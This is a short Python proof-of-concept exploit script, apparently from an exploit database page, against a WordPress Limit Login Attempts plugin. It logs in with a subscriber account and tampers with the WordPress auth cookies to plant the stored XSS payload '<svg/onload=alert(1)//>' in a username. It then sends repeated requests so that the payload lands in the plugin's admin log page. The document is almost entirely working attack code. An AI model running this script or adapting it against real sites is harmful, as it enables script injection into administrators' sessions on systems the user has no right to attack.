Share
## https://sploitus.com/exploit?id=WPEX-ID:461CBCCA-AED7-4C92-BA35-EBABF4FCD810
import requests
import sys
import re

if len(sys.argv) != 4:
	print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
	sys.exit()

url = sys.argv[1].rstrip('/')

with requests.Session() as s:
	print('Logging in...')
	# Log into WordPress using our Subscriber account
	res = s.post(
		url + '/wp-login.php',
		headers={ 'Cookie': 'wordpress_test_cookie=WP Cookie check' },
		data={'log':sys.argv[2], 'pwd':sys.argv[3], 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie':1})
	# Send 5 corrupted cookies with malicious usernames in them
	print('Sending corrupted cookies 5 times..')
	for cookie in s.cookies.keys():
		if re.match(r'wordpress_[0-9a-f]+', cookie):
			malicious_payload = s.cookies.get(name=cookie, path='/').replace(sys.argv[2], 'MALICIOUS_USERNAME<svg/onload=alert(1)//>')
			s.cookies.set(name=cookie, value=None, path='/')
			s.cookies.set(name=cookie, value=malicious_payload, path='/')

	for i in range(5):
		s.get( url + '/wp-admin/')

print(f'View limit-login-attempts logs now at {sys.argv[1]}/wp-admin/options-general.php?page=limit-login-attempts')